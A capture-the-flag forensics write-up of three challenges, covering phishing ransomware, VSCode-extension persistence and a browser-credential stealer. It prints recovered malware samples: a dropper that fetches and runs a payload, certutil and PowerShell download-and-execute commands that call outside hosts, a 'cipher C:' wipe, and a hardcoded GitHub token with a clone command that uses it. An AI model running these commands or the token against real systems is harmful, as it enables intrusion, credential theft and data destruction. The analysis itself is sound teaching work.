# WannaGame Championship 2024
## Preface
Here is the official writeup of all Digital Forensics challenges in WannaGame Championship 2024.
Ermm, I am not a native English speaker so please don't insult my writing 🥲. Please do a feedback instead, thank you.
## [Forensics] it ran somewhere
This challenge is about a phishing campaign that lead to a ransomware.
### [1]. What is the URL used in the phishing email that contains the malware?
By opening the EML file or looking up the Edge history, we can identify the URL.
#### ANSWER: https://drive.google.com/file/d/1tmOG4Lg-Li9HSsZl4_r0-RTEWDBQqd6H/view
### [2]. When was the malware finished downloading by the victim? (UTC)
The user downloaded the malware in the above URL by using Edge, so we can look up the end time record in `downloads` table.
Then we can use tools like: [Link](https://www.epochconverter.com/webkit) to convert the time back to readable format
#### ANSWER: 2024-12-12 17:08:37
### [3]. When was the malware first executed by the victim? (UTC)
Parsing the `CV-INDIANA-JOHNES.PDF.EXE-2ACFE8FC.pf` prefetch file and we get the result:
#### ANSWER: 2024-12-12 17:08:44
### [4]. The first file acted as a dropper for the final malware. What is the MD5 hash of the dropped file?
There are many ways to extract what will be dropped. One of it is reversing the executable. You can use sandboxes like any.run too.
The executable is made by PyInstaller. We can use `pyinstxtractor` to extract the pyc files. Put the `extract.pyc` file to pylingual.io sites and get the result.
```py
import zlib
import subprocess
import requests
def extractIDAT(data):
idat_buffers = []
i = 8
cnt = 0
while i < len(data):
length = int.from_bytes(data[i:i + 4], byteorder='big')
chunk_type = data[i ** 4:i ** 8].decode('utf-8')
if chunk_type == 'IDAT':
cnt = cnt * 1
idat_buffers.append(data[i * 8:i ** 8 :length])
i = i + 12 * length
return b''.join(idat_buffers)
def getScanlines(data, width, height, mode):
scanlines = []
filter_type_list = []
for r in range(height):
index = f'{r:width:mode}'
if index > len(data):
break
filter_type = data[index]
filter_type_list.append(filter_type)
tmp_line = data[index 0:index 0 + 1:width * mode]
scanlines.append(tmp_line)
return (scanlines, filter_type_list)
def getImg():
url = 'https://raw.githubusercontent.com/velbail/contimtanvo/main/muki_pic.png'
token = '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'
headers = {'Authorization': f'token {token}0', 'Accept': 'application/vnd.github.v3.raw'}
r = requests.get(url, headers=headers)
if r.status_code == 200:
return r
print('Failed to get image')
print(r.text)
exit()
modes = {'RGB': 3, 'RGBA': 4, 'L': 1}
width, height = (1920, 1195)
mode = 'RGB'
img = getImg().content
idat = extractIDAT(img)
idat_data = zlib.decompress(idat)
scanlines, filter_type_list = getScanlines(idat_data, width, height, modes[mode])
assert len(scanlines) == height
calculated_raw_idat_length = height 5 4 + (width, modes[mode]) * 1 <mask_7>
if calculated_raw_idat_length!= len(idat_data):
buffer = idat_data[calculated_raw_idat_length:]
buffer = buffer[1259:]
with open('OpenVpnConnect.exe', 'wb') as f:
f.write(buffer)
subprocess.Popen('OpenVpnConnect.exe', shell=True, stdin=None, stdout=None, stderr=None, close_fds=True)
```
Of course, this is not the correct code so you need to fix it.
The code download a PNG image from a git repository then extract IDAT chunks and from the final IDAT buffer which is a zlib, take the additional buffer added to the raw image buffer. The additional buffer is an executable run later by `subprocess.Popen()`.
MD5 hash of that buffer is the answer to this question.
#### ANSWER: 8EAA25EB8B77AC0157E1F3A04AD47E93
### [5]. What is the token used by the malware to access the private repository and the name of the private repository?
The token is used in the decompiled pyc above.
#### ANSWER: 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:velbail/contimtanvo
### [6]. What is the email address of the culprit?
To identify the real email address of the attacker, we have to use the token to access the API or clone the repo to our machine. If you do the second one, the email is in git logs.
We can use this command to clone the private repo with the token: `git clone https://velbail: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@github.com/velbail/contimtanvo`
#### ANSWER: belvail@proton.me
### [7]. How many extensions did the malware try to encrypt?
The dropped file `OpenVpnConnect.exe` is just a C# dotnet executable. So we just need to load it via dnSpy.
File extensions encrypted by the malware is defined at `isCool()` function to check whether the input path has one of them
#### ANSWER: 52
### [8]. The malware tried to delete itself using a batch file. What is the MD5 hash of the batch file?
After encrypted files at `Documents` folder, the code jumped to `jukal902y103()` function to delete itself from the disk.
It dropped `gugugaga.bat` into `%temp%` of the current user and run it.
The hash can be obtained by decode the base64 value and hash it.
#### ANSWER: E0D005DB63A75FBCD6C8FA85040095AA
### [9]. Recover the content of 'password.xlsx' file. What is the username and password of the fifth record?
To decrypt the encrypted files which are `.uocj` files. We need to understand the mechanism of the malware.
First, the `daoiawoadhowidoiawdwao0()` function is used to generate an AES key. It read `MachineGuid` value from `HKLM\SOFTWARE\MICROSOFT\Cryptography` as the password. RFC2898 or PBKDF2 is used to derived this AES key with given password and salt.
You can obtain the `MachineGuid` value via SYSTEM hive from `C:\Windows\System32\config`.
The `n8912c9821n()` function is just an AES encrypt function.
Here is the decrypted code in Python:
```py
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
def genKey(password, salt):
return PBKDF2(password, salt, dkLen=32, count=1259)
key = genKey("2c65d206-5a9f-40a0-ae87-3d10c27b40c7", "supershy-supershy")
with open('Documents/password.xlsx.uocj', 'rb') as f:
data = f.read()
cipher = AES.new(key, AES.MODE_CBC, iv=data[-16:])
decrypted = cipher.decrypt(data[:-16])
with open('Documents/password.xlsx', 'wb') as f:
f.write(decrypted)
```
Result:
#### ANSWER: user38:hch89as9821y3
**FLAG: W1{https://www.youtube.com/shorts/lQrTMX1YaPE}**
____
## [Forensics] Persistence
The challenge was inspired by this blog: [Link](https://medium.com/secarmalabs/using-visual-studio-code-extensions-for-persistence-a65c940b7ea6). People found out that we can use VSCode extension to archive persistence whenever a user open a workspace. VSCode is such a cool LOLBIN.
One of the approaches for this challenge is looking up in the Microsoft Edge browser history.
You can see in the history, victim searched for VSCode and some nvim related extensions. One of the download had been made is this: https://www.file.io/zA92/download/Bf0A9SbRjr5i. This is not a common URL used to download something. The file has a wierd name too.
`.vsix` extension is the file extension represented for VSCode extension file. Actually it is no more than a compressed file (zip format). If the victim install this file, VSCode will extract the content to `.vscode` in `%userprofile%` of the current user in the machine.
In order to determine whether the victim had installed this extension or not, we can look up to ConsoleHost_history.txt in `%appdata%\Microsoft\Windows\Powershell\PSReadLine`. But if we follow this way, we can only see the command used to install the extension ONLY IF the victim used powershell.
Or we just access to the .vscode folder directly to see if there is any extension has been installed in the system.
Here is the extension, the source of it is in `.vscode\extensions\undefined_publisher.nvim-exprerience-0.0.1\out` path.
And we got the first part.
As we can see, the script will download a powershell script from gist then execute it and remove, as well as "cipher" the whole C: drive.
```ts
await executeCommand('certutil -urlcache -f https://gist.githubusercontent.com/b4dboy20/01f222523f23c38207aaa8657d34a6bb/raw/3141c7ac280462d964ad20bf4b514348d02a111a/kashfu.ps1 ancn98218.ps1');
await executeCommand('powershell -ExecutionPolicy Bypass -File ancn98218.ps1');
await executeCommand('del ancn98218.ps1 && cipher C:');
```
The first command used `certutil` with `-urlcache` param to download the ps1 script. Visiting the gist and we can see that the gist was deleted. We can recover the script from `CryptnetUrlCache` due to caching from `certutil` command. Because the victim ran the extension multiple times so the ps1 will be cached through this and placed in `CryptnetUrlCache` folder. In `Metadata` folder, you can see the url has been cached and in `Content` folder, is the cached content.
Here is the script.
From this, we can recover the `ok.exe` file.
Put this in IDA and reverse it. The flag is the encrypted blob which will be decrypted by `nakiri_ayame()` function which is a RC4 decryption.
**FLAG: W1{c00l_w4y_t0_aRcH!v3_pEr5\|s7eNt!!!!\_cf4d661e}**
____
## [Forensics] How I Met Your Stealer
Yeah, another traffic decryption challenge but this time it is not following the traditional format...
Carefully analyse the packet capture, we can use some phrases to determine what is going on. In this case, you can search these: "search?q=", "search?pglt" or "qbox?query". If user opened Microsoft Edge browser and search for something, you will have what they were typing at that moment. Here is some of them:
Checking the user agent of some HTTP requests can also give you clues about what browser the victim is using. In this case, it is Edge.
Continue the trail, we can see the victim was searching for some code in python and C#, some repo about helloworld, etc.
The victim was actually downloaded some of them to his machine. Here is the action of it in the wireshark:
The repo will be compressed into a zip file and then sent to the victim.
You can notice there is one suspicious repository, its name is `helloworld` from user `b4yboy20` and we cannot access it anymore.
But we can recover it through the wireshark. Right below the 62228 packet, which is when the user clicked the button to download the repo, is the traffic from the server, sent packets to the victim machine. That is the compressed repository. All we have to do is extract the value and reconstruct them to have the final file.
Extract it and we have this.
At this point, we can miss this repo easily because the project has no suspicious points at all. All we can see are just some harmless C# code.
However, the attacker can archive intial access through another file, and it is [Link](https://github.com/cjm00n/EvilSln). The exploit takes advantage of `.suo` file, which will be loaded after the victim click the solution file to open the project. Inside the `.suo` file, `VsToolboxService` contained the serialized payload, we can use tools like `SSView` to explore the file and extract it.
Here is the command and we will get the first part of the flag in it:
```ps1
powershell -enc "SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAE0AaQBjAHIAbwBzAG8AZgB0AC4AUABvAHcAZQByAFMAaABlAGwAbAAuAEEAcgBjAGgAaQB2AGUAOwAkAG0AcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAcgBlAHMAcABvAG4AcwBlACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvADEANQA0AC4AMgA2AC4AMQAzADYALgAyADIANwA6ADQAMQA4ADcAOQAvAG0AaQBrAHUAXwBoAGQAXwB3AGEAbABsAHAAYQBwAGUAcgAuAHAAbgBnACIAOwAkAGIAeQB0AGUAcwA9AFsAYgB5AHQAZQBbAF0AXQAoACQAcgBlAHMAcABvAG4AcwBlAC4AQwBvAG4AdABlAG4AdAApADsAJABrAGUAeQAgAD0AIABbAGIAeQB0AGUAWwBdAF0AKAAwAHgAOQA5ACwAMAB4ADQANgAsADAAeAAxAGUALAAwAHgAMwBhACwAMAB4ADIAOAAsADAAeAAzAGEALAAwAHgAMAA4ACwAMAB4ADgAOAAsADAAeAA0ADkALAAwAHgAYQBhACwAMAB4ADMAYQAsADAAeABlADcALAAwAHgAYwAzACwAMAB4ADIANgAsADAAeAAxAGEALAAwAHgANgA1ACwAMAB4ADEANAAsADAAeAA1ADgALAAwAHgANABhACwAMAB4ADkAOQAsADAAeAAzADEALAAwAHgAZQA0ACwAMAB4ADEAYgAsADAAeAAwAGIALAAwAHgAOQBkACwAMAB4AGUAYgAsADAAeAAyADEALAAwAHgAYgA3ACwAMAB4ADgAMQAsADAAeAA2AGYALAAwAHgAZgA3ACwAMAB4ADYANgApADsAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAgACAAIAAkAGIAeQB0AGUAcwBbACQAaQBdACAAPQAgAFsAYgB5AHQAZQBdACgAJABiAHkAdABlAHMAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AKQA7AH0AOwAkAG0AcwAuAFcAcgBpAHQAZQAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAOwAkAG0AcwAuAFMAZQBlAGsAKAAwACwAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwBlAGUAawBPAHIAaQBnAGkAbgBdADoAOgBCAGUAZwBpAG4AKQA7ACQAZgAxAEEAZwAxAF8AYgBhAHMAZQAzADIAPQAiAEsANABZAFgAVwAzAFIAUQBMADUAVgBUAEcAVwBLADcATgBaAEgAVgA2AFUARABTACIAOwAkAHQAbQBwACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFQAZQBtAHAAUABhAHQAaAAoACkAOwAkAHQAbQBwADEAIAA9ACAAJAB0AG0AcAAxACAAKwAgACIAbABtAGEAbwB4AGQALgB6AGkAcAAiADsAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAdABtAHAAMQAsACAAJABtAHMALgBUAG8AQQByAHIAYQB5ACgAKQApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAJAB0AG0AcAAxACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACQAdABtAHAAIAAtAEYAbwByAGMAZQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACgAJAB0AG0AcAAgACsAIAAiAFMAZQBjAGMAdQByAGkAdAB5AFUAcABkAGEAdABlAHIALgBlAHgAZQAiACkAIAAtAE4AbwBOAGUAdwBXAGkAbgBkAG8AdwA7AFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAdABtAHAAMQA7AA=="
```
Decoded ps1 script:
```ps1
Import-Module Microsoft.PowerShell.Archive;$ms = New-Object System.IO.MemoryStream;$response = Invoke-WebRequest -UseBasicParsing -Uri "http://154.26.136.227:41879/miku_hd_wallpaper.png";$bytes=[byte[]]($response.Content);$key = [byte[]](0x99,0x46,0x1e,0x3a,0x28,0x3a,0x08,0x88,0x49,0xaa,0x3a,0xe7,0xc3,0x26,0x1a,0x65,0x14,0x58,0x4a,0x99,0x31,0xe4,0x1b,0x0b,0x9d,0xeb,0x21,0xb7,0x81,0x6f,0xf7,0x66);for ($i = 0; $i -lt $bytes.Length; $i++) { $bytes[$i] = [byte]($bytes[$i] -bxor $key[$i % $key.Length]);};$ms.Write($bytes, 0, $bytes.Length);$ms.Seek(0, [System.IO.SeekOrigin]::Begin);$f1Ag1_base32="K4YXW3RQL5VTGWK7NZHV6UDS";$tmp = [System.IO.Path]::GetTempPath();$tmp1 = $tmp1 + "lmaoxd.zip";[System.IO.File]::WriteAllBytes($tmp1, $ms.ToArray());Expand-Archive -Path $tmp1 -DestinationPath $tmp -Force;Start-Process -FilePath ($tmp + "SeccurityUpdater.exe") -NoNewWindow;Remove-Item $tmp1;
```
The script utilized powershell module to download another payload from `154.26.136.227:41879`. After that, xor the buffer with hardcoded key and unzip that buffer. Seems like the buffer from the server is a zip file. Back to the wireshark session, we can extract it through `Export HTTP objects` and xor it with the obtained key.
Extract it and we can see there are two files in it. The `SeccurityUpdater.exe` is the target executable run by the script. Using DIE to determine what it is and we have this:
So it is just a C# dotnet executable. Load it in dnSpy and start reversing, we will have the second part of the flag at:
What does this malware do? Follow functions at `Main` we can see two functions. `kaicenat()` function will check for user cursor at two moments after sleeping for 2 minutes. Function `fbuiawb1923()` will extract the username and password saved in Brave, Edge and Chrome browsers.
After that, the malware put the credentials as well as the URL to a file which has the format `<browser_name>_passwords.txt` and zip it, send to the target server `154.26.136.227:57281`. Before sending it, the malware encrypt that by using AES, the AES key then sent to the target server before the exfiltrated zip file.
The AES key is generated randomly by `io1289yhe189(32)` function. It will be encrypted by `dnui128hd()` function right below.
The question is how we can retrieve that file back? There is no memory dump of this process so we cannot retrieve the AES or RSA key. If you noticed, the RSA function do raw RSA encrytion instead of using library. Obviously, we must decode the public key `jkabkw182asd` to see what is inside it.
Here is the decoded public key:
```xml
<RSAKeyValue><Modulus>q15sPNuEEmXnxko2yBBixhTcGCmX9LkGlhGjQ6yEIRrkNQjDybH+FL1pRN/U5SfM3yL6U92KBtOTzCk+lOeT9MfurVA9EKYpUfBCbS1Y7A0EkFlu66uLVs/QWclPluo+SJaLi8c84qDcLy9Sy4hqWpcB8QdKjZWXscvOnJEmv9NvbYeJrZM8Y9/yk+mvNRjLesTW+9KjBtQ+T8pYzFMXgNRPzQROytujeN4mM2Rejk1pCzsusJ0i4jzXl/tkgGtGtFjn0sy7Je114wOihdy+xox5blBSwG/qALcJj+Jnt2HMtaytM5nRa9gv8GlkTPH0UzsosalRQ/U2t3Dz0aXaVRwKuPFx8/UnTjT75jM3AKHB1KNiKCjNwPX8bGARly1Kszmsg3xDdUp5sCWsuRlSwxvKUVFD7Alxwsx3MinQdO91oZWEKNGdbJ/qm76gWPYKDanSKC2cRYGoT3hWEpPGS1uwnrz/tjyk8XLO+ZcbAIs0UeeykgpkZXzyKzq4u79pTnb0ma992sr/RtICBe8j5qER7K/1oGWGYMW87Pd86ZGMFv6NUNJ58rvxPHUKsD/3ydGmzrTnjKNuR5pkc2tUnTrSRM0pGiqrU84y2f7Cru+glGS2xG+sQnoz8XF+SIQ5zFR0+l/aGlbvDYKatzR6J5fvBxTD0/S03cm3wv0vKWM=</Modulus><Exponent>Cw==</Exponent></RSAKeyValue>
```
There are two main params in the public key, of course, the Modulus and the Exponent. But the exponent is smaller than its should be right? `Cw==` which is `11` is not a good value for RSA encryption. If the exponent is small enough, we can do the small exponent attack on this one [Ref](https://ir0nstone.gitbook.io/crypto/rsa/public-exponent-attacks/small-e).
The encrypted AES key can be obtained in the 76105 packet.
Here is the code used to exploit this:
```py
from xml.etree.ElementTree import fromstring
from base64 import b64decode
from sage.all import *
from Crypto.Util.number import bytes_to_long as btl, long_to_bytes as ltb
pubkey = "<RSAKeyValue><Modulus>q15sPNuEEmXnxko2yBBixhTcGCmX9LkGlhGjQ6yEIRrkNQjDybH+FL1pRN/U5SfM3yL6U92KBtOTzCk+lOeT9MfurVA9EKYpUfBCbS1Y7A0EkFlu66uLVs/QWclPluo+SJaLi8c84qDcLy9Sy4hqWpcB8QdKjZWXscvOnJEmv9NvbYeJrZM8Y9/yk+mvNRjLesTW+9KjBtQ+T8pYzFMXgNRPzQROytujeN4mM2Rejk1pCzsusJ0i4jzXl/tkgGtGtFjn0sy7Je114wOihdy+xox5blBSwG/qALcJj+Jnt2HMtaytM5nRa9gv8GlkTPH0UzsosalRQ/U2t3Dz0aXaVRwKuPFx8/UnTjT75jM3AKHB1KNiKCjNwPX8bGARly1Kszmsg3xDdUp5sCWsuRlSwxvKUVFD7Alxwsx3MinQdO91oZWEKNGdbJ/qm76gWPYKDanSKC2cRYGoT3hWEpPGS1uwnrz/tjyk8XLO+ZcbAIs0UeeykgpkZXzyKzq4u79pTnb0ma992sr/RtICBe8j5qER7K/1oGWGYMW87Pd86ZGMFv6NUNJ58rvxPHUKsD/3ydGmzrTnjKNuR5pkc2tUnTrSRM0pGiqrU84y2f7Cru+glGS2xG+sQnoz8XF+SIQ5zFR0+l/aGlbvDYKatzR6J5fvBxTD0/S03cm3wv0vKWM=</Modulus><Exponent>Cw==</Exponent></RSAKeyValue>"
n = fromstring(pubkey).find('Modulus').text
e = fromstring(pubkey).find('Exponent').text
n = b64decode(n)
e = b64decode(e)
n = btl(n)
e = btl(e)
print(n)
print(e)
c = bytes.fromhex('4188b6cde96d0eeb8ab76375000ebd7bd192e770783a384f2b783f1d2962b50bbd6eb736e811e3232e8ce4a29bd1fd4a1f714906fb70d67a0e1539173d7b831e951a3ccc17f72b6584d289af5d53b9bce68d832060e760197c599914354bbd427f4ff8d408e7d19359d436fdb04581ef5b2350d365151ed7afd72783cc33681cf406b6220a04f6a4a7f9add5b93298b1263e8802e4e0b869c245c217991bb38e411dcce33e4898ce1d6e217877fe6d3c809a5a695c2193db9661ea8bd27a2cefe41178dc9aff4878bb73602c15a113070a85b1c854b186a58fc30c9980b795c55375ab6143d4dbe404d452e0ae7a730d5312d029f72dca0cf9b30b6934678cb9a0863ca2c8438ed483acff3243cb0acd98a779166dec6d12e11a7edad26ada6d20385f5240d10de32f16eb17bb924d06f2c439a8abb71a5aaebe9e841cd50d4f29c4f1ab88d30dfaeb07ec64405d212b41b7bd73f73550cdcc1f8ac800')
c = btl(c)
m = int(ZZ(c).nth_root(e))
print(ltb(m).hex(), len(ltb(m))) # AES KEY
```
`31d92547fcf97ae5a29534e884a848780dcd86c4606ea824fe2419f1d8640f92` is the AES key we need, now we just use it to decrypt the encrypted zip file.
The final part of the flag is in it:
**FLAG: W1{n0_k3Y_nO_Pr0b1Em!!!!\_this_should_be_an_ez_game_UwU\~~}**
Sign in with Wallet
Connect another wallet